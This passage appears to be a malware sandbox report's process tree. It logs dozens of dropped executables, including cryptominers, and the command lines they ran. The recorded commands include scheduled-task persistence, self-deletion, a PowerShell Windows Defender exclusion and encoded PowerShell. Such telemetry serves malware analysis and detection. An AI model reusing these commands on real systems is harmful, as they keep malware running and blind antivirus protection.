- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\l1644286.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\l1644286.exe
4⤵
PID:3120

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\m8551818.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\m8551818.exe
3⤵
PID:4468

C:\Users\Admin\AppData\Local\Temp\a\foto01831.exe
"C:\Users\Admin\AppData\Local\Temp\a\foto01831.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3192

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\x6794257.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\x6794257.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4760

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\g9058470.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\g9058470.exe
4⤵
- Executes dropped EXE
PID:3160

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\h6396357.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\h6396357.exe
4⤵
PID:4000

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\i1837713.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\i1837713.exe
3⤵
PID:5908

C:\Users\Admin\AppData\Local\Temp\a\photo_5601.exe
"C:\Users\Admin\AppData\Local\Temp\a\photo_5601.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3564

C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\v4750022.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\v4750022.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3884

C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\a6821364.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\a6821364.exe
4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\b8331973.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\b8331973.exe
4⤵
PID:2908

C:\Users\Admin\AppData\Local\Temp\a\222.exe
"C:\Users\Admin\AppData\Local\Temp\a\222.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:652

C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
2⤵
- Executes dropped EXE
PID:5060

C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
3⤵
PID:5496

C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe"
2⤵
- Executes dropped EXE
PID:3512

C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe"
3⤵
PID:5412

C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe"
3⤵
PID:5440

C:\Users\Admin\AppData\Local\Temp\a\vice.exe
"C:\Users\Admin\AppData\Local\Temp\a\vice.exe"
2⤵
PID:4380

C:\Users\Admin\AppData\Local\Temp\a\vice.exe
"C:\Users\Admin\AppData\Local\Temp\a\vice.exe"
3⤵
PID:5412

C:\Users\Admin\AppData\Local\Temp\a\vice.exe
"C:\Users\Admin\AppData\Local\Temp\a\vice.exe"
3⤵
PID:4332

C:\Users\Admin\AppData\Local\Temp\a\rundll32.exe
"C:\Users\Admin\AppData\Local\Temp\a\rundll32.exe"
2⤵
- Executes dropped EXE
PID:1780

C:\Users\Admin\AppData\Local\Temp\a\Setup2.exe
"C:\Users\Admin\AppData\Local\Temp\a\Setup2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4656

C:\Users\Admin\AppData\Local\Temp\FpMk0Pc.exe
"C:\Users\Admin\AppData\Local\Temp\FpMk0Pc.exe"
3⤵
PID:2208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1792
3⤵
- Program crash
PID:912

C:\Users\Admin\AppData\Local\Temp\a\am.exe
"C:\Users\Admin\AppData\Local\Temp\a\am.exe"
2⤵
- Executes dropped EXE
PID:3012

C:\Users\Admin\AppData\Local\Temp\9b52a1ac2c\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\9b52a1ac2c\oneetx.exe"
3⤵
PID:3468

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\9b52a1ac2c\oneetx.exe" /F
4⤵
- Creates scheduled task(s)
PID:4956

C:\Users\Admin\AppData\Roaming\1000020050\rundll32.exe
"C:\Users\Admin\AppData\Roaming\1000020050\rundll32.exe"
4⤵
PID:5100

C:\Users\Admin\AppData\Local\Temp\a\rundll32.exe
"C:\Users\Admin\AppData\Local\Temp\a\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000021061\sc64.dll, rundll
4⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\a\build.exe
"C:\Users\Admin\AppData\Local\Temp\a\build.exe"
2⤵
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\build.exe
3⤵
PID:1012

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:4508

C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
2⤵
PID:4680

C:\Users\Admin\AppData\Local\Temp\a\SvCpJuhbT.exe
"C:\Users\Admin\AppData\Local\Temp\a\SvCpJuhbT.exe"
2⤵
PID:648

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\SysWOW64\notepad.exe"
3⤵
PID:4944

C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
"C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
4⤵
PID:5192

C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
"C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
4⤵
PID:6728

C:\Users\Admin\AppData\Local\Temp\a\EdGen.exe
"C:\Users\Admin\AppData\Local\Temp\a\EdGen.exe"
2⤵
PID:4432

C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
2⤵
PID:1592

C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
3⤵
PID:5596

C:\Users\Admin\AppData\Local\Temp\a\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\a\vpn.exe"
2⤵
PID:4944

C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe"
2⤵
PID:3548

C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe"
3⤵
PID:1280

C:\Users\Admin\AppData\Local\Temp\a\build(3).exe
"C:\Users\Admin\AppData\Local\Temp\a\build(3).exe"
2⤵
PID:4076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "build(3)" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\NET.Framework\build(3).exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a\build(3).exe" &&START "" "C:\Users\Admin\AppData\Local\NET.Framework\build(3).exe"
3⤵
PID:4176

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:5164

C:\Windows\system32\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:4796

C:\Windows\system32\schtasks.exe
schtasks /create /tn "build(3)" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\NET.Framework\build(3).exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:12652

C:\Users\Admin\AppData\Local\NET.Framework\build(3).exe
"C:\Users\Admin\AppData\Local\NET.Framework\build(3).exe"
4⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\a\Nfjyejcuamv.exe
"C:\Users\Admin\AppData\Local\Temp\a\Nfjyejcuamv.exe"
2⤵
PID:4904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA==
3⤵
PID:4132

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
PID:3644

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe"
2⤵
PID:3772

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup.exe" /c:WW.Datacash.CPI202304 /pmode:2 /syncid0_2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
3⤵
PID:6724

C:\Program Files (x86)\1683267112_0\360TS_Setup.exe
"C:\Program Files (x86)\1683267112_0\360TS_Setup.exe" /c:WW.Datacash.CPI202304 /pmode:2 /syncid0_2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
4⤵
PID:4832

C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe"
2⤵
PID:3648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IOktOFpaLKGPz.exe"
3⤵
PID:5748

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOktOFpaLKGPz" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5EE4.tmp"
3⤵
- Creates scheduled task(s)
PID:1032

C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe"
3⤵
PID:744

C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe"
3⤵
PID:4352

C:\Users\Admin\AppData\Local\Temp\a\thirdbobbyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\thirdbobbyzx.exe"
2⤵
PID:1008

C:\Users\Admin\AppData\Local\Temp\pcxwpvbryx.exe
"C:\Users\Admin\AppData\Local\Temp\pcxwpvbryx.exe" C:\Users\Admin\AppData\Local\Temp\qjvqkpi.odu
3⤵
PID:1636

C:\Users\Admin\AppData\Local\Temp\a\vbc.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc.exe"
2⤵
PID:592

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:5992

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:6056

C:\Users\Admin\AppData\Local\Temp\a\v123.exe
"C:\Users\Admin\AppData\Local\Temp\a\v123.exe"
2⤵
PID:3020

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
3⤵
PID:5216

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
3⤵
PID:5348

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
3⤵
PID:5556

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
3⤵
PID:5576

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
3⤵
PID:5488

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
3⤵
PID:5492

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
3⤵
PID:5484

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
3⤵
PID:4092

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
3⤵
PID:5424

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
3⤵
PID:4368

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
3⤵
PID:5436

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
3⤵
PID:5428

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
3⤵
PID:5388

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
3⤵
PID:5372

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
3⤵
PID:5356

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
3⤵
PID:5312

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
3⤵
PID:5296

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
3⤵
PID:5276

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
3⤵
PID:5308

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
3⤵
PID:5256

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
3⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\a\dan.exe
"C:\Users\Admin\AppData\Local\Temp\a\dan.exe"
2⤵
PID:4172

C:\Users\Admin\AppData\Local\Temp\a\nxmr.exe
"C:\Users\Admin\AppData\Local\Temp\a\nxmr.exe"
2⤵
PID:5228

C:\Users\Admin\AppData\Local\Temp\a\vbc1.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc1.exe"
2⤵
PID:5468

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:8188

C:\Users\Admin\AppData\Local\Temp\a\services.exe
"C:\Users\Admin\AppData\Local\Temp\a\services.exe"
2⤵
PID:5824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
3⤵
PID:5924

C:\Users\Admin\AppData\Local\Temp\a\install.exe
"C:\Users\Admin\AppData\Local\Temp\a\install.exe"
2⤵
PID:6036

C:\Users\Admin\AppData\Local\Temp\a\install.exe
C:\Users\Admin\AppData\Local\Temp\a\install.exe
3⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe"
2⤵
PID:5132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
3⤵
PID:5232

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Scnolxsyquote .pdf"
3⤵
PID:4156

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
PID:8356

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
PID:4188

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
PID:8284

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
PID:9348

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
PID:9796

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=8D7DF734450770F3AE43646A3BA58820 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=8D7DF734450770F3AE43646A3BA58820 --renderer-client-id=2 --mojo-platform-channel-handle=1580 --allow-no-sandbox-job /prefetch:1
5⤵
PID:7356

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=61A8CA20F0320F6C2420C31A62B8DEAC --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:9680

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4361875DB8F6D805B2D7F1F6E6528EDD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4361875DB8F6D805B2D7F1F6E6528EDD --renderer-client-id=4 --mojo-platform-channel-handle=2188 --allow-no-sandbox-job /prefetch:1
5⤵
PID:5132

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B68A0524CDEF63C4BEA425D60630D052 --mojo-platform-channel-handle=2596 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:6148

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4A5859CFA6B6BB1D5071FAA5459E30A5 --mojo-platform-channel-handle=2024 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:11040

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
